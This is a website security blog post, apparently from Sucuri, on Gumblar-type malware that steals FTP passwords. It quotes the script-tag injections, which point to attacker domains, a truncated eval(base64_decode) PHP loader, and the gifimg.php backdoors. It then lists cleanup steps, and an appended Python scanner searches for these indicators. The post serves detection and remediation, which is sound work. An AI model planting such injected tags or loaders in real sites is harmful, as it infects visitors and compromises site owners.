begood

Web site security - It starts with your desktop


If you have a web site and you want it to be secure, the first place you have to protect is your desktop.

Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop viruses (generally called Gumblar, port 8080, etc.). These viruses steal your FTP password and do the following things:

  1. Infects all .js files on your site with entries like this one:

    document.write('<script src=http://wap.northernplumbingandheating.com/assets/postinfo.php');

    document.write('<script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php');


  2. Infects every .html file with entries similar to these:

    <script src=http://wap.northernplumbingandheating.com/assets/postinfo.php

    <script src=http://shopping-dubai.com/images/runActiveContent.php >

    <script src=http://stb-umhau.de/images/muffin35.php >

    <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php


  3. Infects every PHP file with code similar to this one:

    <?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF..


  4. Also creates backdoor files called gifimg.php in multiple directories.

Note that the domain changes every time and this is just a small list of them:

How to clean my desktop if I have this virus?

  1. Install an anti-virus and make sure it detected and removed the problem. If it didn't, try a different one :)
  2. Change your FTP passwords.
  3. Start using SFTP instead of FTP.
  4. Do not store your FTP/SFTP password on your desktop.

How to clean my site if it is infected?

You can hire us to clean it up for you and monitor your sites going forward:

Sucuri Security

Or if you prefer to do it yourself:

  1. Scan your site to see where the malware is and how it is called on your site.
  2. Download your whole site to your desktop.
  3. Use grep (or wingrep) and search for src=http and eval(base64_decode("aW
  4. Remove all those entries as well as the gifimg.php backdoors.
  5. Re-upload your site.

That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.
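Steps 1 and 3 of the do-it-yourself cleanup, as an added example (not from the original post or from Sucuri): a read-only Python scanner that walks a downloaded copy of the site and reports the three indicators the post names (unquoted src=http script tags, the eval(base64_decode("aW prefix, and files named gifimg.php). The sample site it builds is constructed for the demo, and EXAMPLE-DOMAIN.invalid is a placeholder host, not one of the domains in the post.

```python
import os
import re
import tempfile

# Indicators quoted in the post; the regex only matches an unquoted src=http, so a normal
# quoted <script src="https://..."> tag is not flagged.
INJECTED_SRC = re.compile(r"<script\s+src=http[^\s>'\"]*", re.IGNORECASE)
EVAL_B64 = 'eval(base64_decode("aW'
BACKDOOR_NAME = "gifimg.php"

def scan_file(path):
    """Return (indicator, detail) hits for one file. Read-only: it reports, never edits."""
    hits = []
    if os.path.basename(path) == BACKDOOR_NAME:
        hits.append(("backdoor-file", BACKDOOR_NAME))
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for m in INJECTED_SRC.finditer(line):
                hits.append(("injected-script", f"line {lineno}: {m.group(0)}"))
            if EVAL_B64 in line:
                hits.append(("eval-base64", f"line {lineno}: eval(base64_decode(...))"))
    return hits

def scan_site(root):
    """Walk the downloaded site tree; map relative path -> hits for flagged files only."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

def build_sample_site():
    """Constructed sample tree reproducing the post's patterns (placeholder domain)."""
    root = tempfile.mkdtemp(prefix="site-")
    samples = {
        "js/menu.js": "function f(){}\ndocument.write('<script src=http://EXAMPLE-DOMAIN.invalid/a.php');\n",
        "index.html": "<html><body>\n<script src=http://EXAMPLE-DOMAIN.invalid/b.php >\n</body></html>\n",
        "inc/config.php": '<?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKC..."));\n',
        "images/gifimg.php": "<?php /* backdoor placeholder */\n",
        "clean.html": '<script src="https://cdn.example/app.js"></script>\n',  # quoted, legitimate
    }
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `scan_site()` against the folder you downloaded in step 2 and review each hit by hand before removing anything; it deliberately does not modify files.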

Sucuri Security: Web site security - It starts with your desktop
